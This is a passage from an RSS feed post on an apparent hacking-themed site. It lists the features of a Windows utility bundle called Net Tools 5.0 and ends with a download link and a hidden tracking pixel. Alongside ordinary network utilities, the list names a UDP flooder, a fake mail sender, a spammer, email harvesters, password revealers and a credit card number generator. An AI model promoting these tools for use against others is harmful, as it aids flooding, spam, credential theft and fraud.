57) Add Bytes to EXE<br />
58) Variable Encryption<br />
59) Simple File Encryption<br />
60) ASCII to Binary (and Binary to ASCII)<br />
61) Enigma<br />
62) Password Unmasker<br />
63) Credit Card Number Validate and Generate<br />
64) Create Local HTTP Server<br />
65) eXtreme UDP Flooder<br />
66) Web Server Scanner<br />
67) Force Reboot<br />
68) Webpage Info Seeker<br />
69) Bouncer<br />
70) Advanced Packet Sniffer<br />
71) IRC server creater<br />
72) Connection Tester<br />
73) Fake Mail Sender<br />
74) Bandwidth Monitor<br />
75) Remote Desktop Protocol Scanner<br />
76) MX Query<br />
77) Messenger Packet Sniffer<br />
78) API Spy<br />
79) DHCP Restart<br />
80) File Merger<br />
81) E-mail Extractor (crawler / harvester bot)<br />
82) Open FTP Scanner<br />
83) Advanced System Locker<br />
84) Advanced System Information<br />
85) CPU Monitor<br />
86) Windows Startup Manager<br />
87) Process Checker<br />
88) IP String Collecter<br />
89) Mass Auto-Emailer (Database mailer; Spammer)<br />
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)<br />
91) Fishing Port Scanner (with named ports)<br />
92) Mouse Record / Play Automation (Macro Tool)<br />
93) Internet / LAN Messenger Chat (Server + Client)<br />
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control<br />
95) Hash MD5 Checker<br />
96) Port Connect &#8211; Listen tool<br />
97) Internet MAC Address Scanner (Multiple IP)<br />
98) Connection Manager / Monitor<br />
99) Direct Peer Connecter (Send/Receive files + chat)<br />
100) Force Application Termination (against Viruses and Spyware)<br />
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)<br />
102) COM Detect and Test<br />
103) Create Virtual Drives<br />
104) URL Encoder<br />
105) WEP/WPA Key Generator<br />
106) Sniffer.NET<br />
107) File Shredder<br />
108) Local Access Enumerater<br />
109) Steganographer (Art of hiding secret data in pictures)<br />
110) Subnet Calculater<br />
111) Domain to IP (DNS)<br />
112) Get SNMP Variables<br />
113) Internet Explorer Password Revealer<br />
114) Advanced Multi Port Scanner<br />
115) Port Identification List (+port scanner)<br />
116) Get Quick Net Info<br />
117) Get Remote MAC Address<br />
118) Share Add<br />
119) Net Wanderer<br />
120) WhoIs Console<br />
121) Cookies Analyser<br />
122) Hide Secret Data In Files<br />
123) Packet Generator<br />
124) Secure File Splitting<br />
125) My File Protection (Password Protect Files, File Injections)<br />
126) Dynamic Switch Port Mapper<br />
127) Internet Logger (Log URL)<br />
128) Get Whois Servers<br />
129) File Split&amp;Merge<br />
130) Hide Drive<br />
131) Extract E-mails from Documents<br />
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer&#8217;s IP, Wake On LAN)<br />
133) Hook Spy<br />
134) Software Uninstaller<br />
135) Tweak &amp; Clean XP<br />
136) Steganographic Random Byte Encryption<br />
137) NetTools Notepad (encrypt your sensitive data)<br />
138) File Encrypter/Decrypter<br />
139) Quick Proxy Server<br />
140) Connection Redirector (HTTP, IRC, &#8230; All protocols supported)<br />
141) Local E-mail Extractor<br />
142) Recursive E-mail Extractor<br />
143) Outlook Express E-mail Extractor<br />
144) Telnet Client<br />
145) Fast Ip Catcher<br />
146) Monitor Host IP<br />
147) FreeMAC (MAC Address Editor)<br />
148) QuickFTP Server (+user accounts support)<br />
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)<br />
150) Network Protocol Analyzer<br />
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)<br />
152) WebMirror (Website Ripper)<br />
153) GeoLocate IP<br />
154) Google PageRank Calculator<br />
155) Google Link Crawler (Web Result Grabber)<br />
156) Network Adapter Binder<br />
157) Remote LAN PC Lister<br />
158) Fast Sinusoidal Encryption<br />
159) Software Scanner<br />
160) Fast FTP Client<br />
161) Network Traffic Analysis<br />
162)                                    Network Traffic Visualiser<br />
163) Internet Protocol Scanner<br />
164) Net Meter (Bandwidth Traffic Meter)<br />
165) Net Configuration Switcher<br />
166) Advanced System Hardware Info<br />
167) Live System Information<br />
168) Network Profiler<br />
169) Network Browser<br />
170) Quick Website Maker and Web Gallery Creator<br />
171) Remote PC Shutdown<br />
172) Serial Port Terminal<br />
173) Standard Encryptor<br />
174) Tray Minimizer<br />
175) Extra Tools (nmap console &amp; win32 version)</p>
<p style="margin-top: 0pt;">Many extra features and utilities are included in this package!</p>
<p><strong>Download Net Tools 5.0</strong></p>
<p><strong>[ <a href="http://www.mabsoft.com/NetTools5.0.70.zip">download</a> ] </strong><span class="style3">(version 5.0.70)</span></p>
<img src="http://www.hacking-gurus.net/wp-content/plugins/pixelstats/trackingpixel.php?post_id=25&ts=1280469237" style="display:none;" alt="pixelstats trackingpixel"/>]]></content:encoded>
			<wfw:commentRss>http://www.hacking-gurus.net/2009/03/08/net-tools/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
